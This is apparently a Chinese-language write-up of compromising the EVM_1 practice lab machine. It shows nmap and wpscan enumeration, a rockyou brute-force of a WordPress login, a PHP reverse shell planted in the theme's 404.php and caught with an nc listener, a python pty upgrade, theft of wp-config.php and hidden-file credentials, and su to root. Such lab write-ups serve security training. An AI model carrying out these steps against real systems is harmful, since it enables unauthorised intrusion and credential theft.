EVM_1 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.103   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:08 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000073s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds

开启了22,53,80,110,139,143,445 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,53,80,110,139,143,445 192.168.56.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:08 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00031s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
|   256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_  256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA TOP RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ENABLE have ID LOGINDISABLEDA0001 more post-login IMAP4rev1 IDLE listed capabilities SASL-IR OK Pre-login LOGIN-REFERRALS LITERAL+
445/tcp open  `�J�V      Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-06-27T08:09:05
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: ubuntu-extermely-vulnerable-m4ch1ine
|   NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
|   Domain name: \x00
|   FQDN: ubuntu-extermely-vulnerable-m4ch1ine
|_  System time: 2023-06-27T04:09:05-04:00
|_clock-skew: mean: 1h19m57s, deviation: 2h18m33s, median: -2s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds

Ubuntu 操作系统

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,53,80,110,139,143,445 192.168.56.103 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:09 EDT
Nmap scan report for 192.168.56.103
Host is up (0.00024s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|   /info.php: Possible information file
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 321.68 seconds

漏洞脚本扫描得到了 wordpress 目录和 info.php，先尝试 smb 脚本扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse  192.168.56.103 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 04:25 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000092s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
MAC Address: 08:00:27:06:73:F2 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.168.56.103\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (ubuntu-extermely-vulnerable-m4ch1ine server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.103\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

Wordpress 渗透

wpscan 扫描

看来 smb 突破点较少，那就将关注点放在 wordpress，使用 wpscan 来进行信息收集

┌──(kali㉿kali)-[~/Desktop/Clash for Windows-0.19.26-x64-linux]
└─$ wpscan --url http://192.168.56.103/wordpress --enumerate u       
Type application/netcdf is already registered as a variant of application/netcdf.
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.103/wordpress/ [192.168.56.103]
[+] Started: Tue Jun 27 04:31:05 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.103/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.103/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.103/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.103/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
 |  - http://192.168.56.103/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] c0rrupt3d_brain
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.103/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 27 04:31:08 2023
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 14.439 KB
[+] Data Received: 522.866 KB
[+] Memory used: 188.668 MB
[+] Elapsed time: 00:00:02

爆破密码

得到了一些目录和一个用户 c0rrupt3d_brain，感觉没什么可利用的插件漏洞，先爆破试试吧

┌──(kali㉿kali)-[~/Desktop/Clash for Windows-0.19.26-x64-linux]
└─$ wpscan --url http://192.168.56.103/wordpress -P /usr/share/wordlists/rockyou.txt -U 'c0rrupt3d_brain'
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.103/wordpress/ [192.168.56.103]
[+] Started: Tue Jun 27 04:42:18 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.103/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.103/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.103/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.103/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
 |  - http://192.168.56.103/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] photo-gallery
 | Location: http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/
 | Last Updated: 2023-06-02T15:32:00.000Z
 | [!] The version is out of date, the latest version is 1.8.16
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.5.34 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.min.css?ver=1.5.34
 |  - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/css/styles.min.css?ver=1.5.34
 |  - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.5.34
 |  - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/js/scripts.min.js?ver=1.5.34
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.103/wordpress/wp-content/plugins/photo-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0rrupt3d_brain / 24992499                                                                              
Trying c0rrupt3d_brain / 24992499 Time: 00:02:54 <                        > (10700 / 14355092)  0.07%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: c0rrupt3d_brain, Password: 24992499

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun 27 04:45:19 2023
[+] Requests Done: 10874
[+] Cached Requests: 5
[+] Data Sent: 3.854 MB
[+] Data Received: 48.842 MB
[+] Memory used: 304.754 MB
[+] Elapsed time: 00:03:00

爆破得到了用户密码 24992499，登陆后查看主题编辑器

其中 404.php 给了提示，可以在这里写反向 shell，我们将 php-reverse-shell.php 修改后放进去，再构造访问会 404 的 URL，提前开启监听，就可以反弹 shell

┌──(kali㉿kali)-[~/Downloads/EVM_1]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.103] 37128
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:55:28 up 52 min,  0 users,  load average: 0.05, 0.44, 1.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can t access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ export TERM=xterm-color
export TERM=xterm-color

提权

反弹 shell 成功，确认目标正确，并进行简单的信息收集

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:06:73:f2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.103/24 brd 192.168.56.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe06:73f2/64 scope link 
       valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ id   
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ uname -a
uname -a
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ pwd
pwd
/
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts

接下来进入/var/ www/html目录看看 ，关注点主要在配置文件上，可以看看是否有数据库连接的密码

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ ls -liah
ls -liah
total 11M
276855 drwxr-xr-x 3 www-data www-data 4.0K Nov  1  2019 .
276854 drwxr-xr-x 3 root     root     4.0K Oct 30  2019 ..
281328 -rw-r--r-- 1 www-data www-data  11K Nov  1  2019 index.html
282142 -rw-r--r-- 1 www-data www-data   21 Oct 30  2019 info.php
401054 drwxr-xr-x 5 www-data www-data 4.0K Nov  1  2019 wordpress
407076 -rw-r--r-- 1 www-data www-data 2.9K Oct 31  2019 wp-config.php
 20482 -rw-r--r-- 1 www-data www-data  11M Oct 30  2019 wp.tar.gz
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don\'t have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'hackme_wp' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', '123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don\'t change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That\'s all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

拿到了数据库的密码 123，进数据库看看

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/var/www/html$ mysql -uroot -p
mysql -uroot -p
Enter password: 123

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 21345
Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| vulnwp             |
+--------------------+
5 rows in set (0.00 sec)

mysql> use vulnwp
use vulnwp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

看一看 wp_user 表

mysql> select * from wp_users;
select * from wp_users;
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
| ID | user_login      | user_pass                          | user_nicename   | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name    |
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
|  1 | c0rrupt3d_brain | $P$BeIRcDvfjdzumCYjeRfShVUMy8BkXf/ | c0rrupt3d_brain | vuln@localhost.ws |          | 2019-10-31 21:47:00 |                     |           0 | c0rrupt3d_brain |
+----+-----------------+------------------------------------+-----------------+-------------------+----------+---------------------+---------------------+-------------+-----------------+
1 row in set (0.00 sec)

home 目录下的隐藏文件

就一个用户，它的密码我们已经通过爆破拿到了，进 home 目录看看

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ cd /home
cd /home
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ ls
ls
root3r
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ ls -liah
ls -liah
total 12K
262146 drwxr-xr-x  3 root     root     4.0K Oct 30  2019 .
     2 drwxr-xr-x 23 root     root     4.0K Oct 30  2019 ..
286738 drwxr-xr-x  3 www-data www-data 4.0K Nov  1  2019 root3r

有个 root3r 用户，而且当前用户对此目录可控，进去看看

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ cd root3r
cd root3r/
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ls -liah
ls -liah
total 40K
286738 drwxr-xr-x 3 www-data www-data 4.0K Nov  1  2019 .
262146 drwxr-xr-x 3 root     root     4.0K Oct 30  2019 ..
282108 -rw-r--r-- 1 www-data www-data  515 Oct 30  2019 .bash_history
278324 -rw-r--r-- 1 www-data www-data  220 Oct 30  2019 .bash_logout
262821 -rw-r--r-- 1 www-data www-data 3.7K Oct 30  2019 .bashrc
286752 drwxr-xr-x 2 www-data www-data 4.0K Oct 30  2019 .cache
282130 -rw-r--r-- 1 www-data www-data   22 Oct 30  2019 .mysql_history
278338 -rw-r--r-- 1 www-data www-data  655 Oct 30  2019 .profile
282736 -rw-r--r-- 1 www-data www-data    8 Oct 31  2019 .root_password_ssh.txt
282182 -rw-r--r-- 1 www-data www-data    0 Oct 30  2019 .sudo_as_admin_successful
282524 -rw-r--r-- 1 root     root        4 Nov  1  2019 test.txt

目录下有不少好东西，先看看.root_password_ssh.txt 吧，从名字上看可能是 root 的密码

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ cat .root_password_ssh.txt
sh.txtoot_password_s 
willy26
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ cat .mysql_history
cat .mysql_history
_HiStOrY_V2_
exit\040
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ su -
su -
Password: _HiStOrY_V2_

su: Authentication failure
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ^[[A
su -
Password: willy26
root@ubuntu-extermely-vulnerable-m4ch1ine:~#

成功切换为 root 用户，最后来个定妆照

root@ubuntu-extermely-vulnerable-m4ch1ine:~# cat proof.txt
cat proof.txt
voila you have successfully pwned me :) !!!
:D
root@ubuntu-extermely-vulnerable-m4ch1ine:~# whoami
whoami
root
root@ubuntu-extermely-vulnerable-m4ch1ine:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:06:73:f2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.103/24 brd 192.168.56.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe06:73f2/64 scope link 
       valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
    link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
root@ubuntu-extermely-vulnerable-m4ch1ine:~# uname -a
uname -a
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux